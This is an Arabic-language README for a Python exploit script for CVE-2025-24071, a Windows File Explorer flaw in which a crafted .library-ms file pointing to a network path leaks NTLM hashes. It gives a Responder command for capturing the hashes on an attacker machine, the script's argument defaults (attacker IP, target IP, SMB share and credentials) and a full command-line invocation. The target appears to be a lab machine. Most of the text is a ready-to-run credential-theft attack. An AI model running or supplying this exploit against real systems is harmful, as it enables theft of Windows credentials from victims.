
نص بايثون لتنفيذ CVE-2025-24071
يكتشف هذا المشروع ويوضح استغلال ثغرة انتحال مستكشف ملفات Windows.
تنشأ المشكلة من ملف مكتبة Windows (.library-ms) يحتوي على مسار شبكة، سواء كمرفق مباشر أو مضمن داخل أرشيف.
عند فتح الملف، يمكن أن يتسبب في تسريب تجزئات NTLM إلى موقع شبكة بعيد (يحتمل أن يكون ضارًا).
على جهازك المهاجم، قم بتشغيل Responder لالتقاط تجزئات NTLM:
sudo responder -I tun0 -wvF
يمكنك تكوين النص البرمجي بطريقتين:
✅ الخيار أ: تحرير القيم الافتراضية (الأسهل)
قم بتعديل المعاملات الافتراضية داخل النص البرمجي مباشرة.
parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP") #your IP
parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP") #target IP
parser.add_argument("--share-name", default="IT", help="SMB share name") #name of the share you have access to without the /
parser.add_argument("--username", default="USERNAME", help="SMB username") #username of the share owner
parser.add_argument("--password", default="PASSWORD", help="SMB password") #password of the share owner
parser.add_argument("--interface", default="tun0", help="Responder network interface") #check ifconfig but tun0 will work if you're on a vpn
return parser.parse_args()
✅ الخيار ب: التشغيل مع معاملات سطر الأوامر
نفذ مع الوسائط:
python3 CVE-2025-24071.py \
--attacker-ip <ATTACKER_IP> \
--target-ip <TARGET_IP> \
--share-name <SHARE_NAME> \
--username <USERNAME> \
--password <PASSWORD> \
--interface <INTERFACE>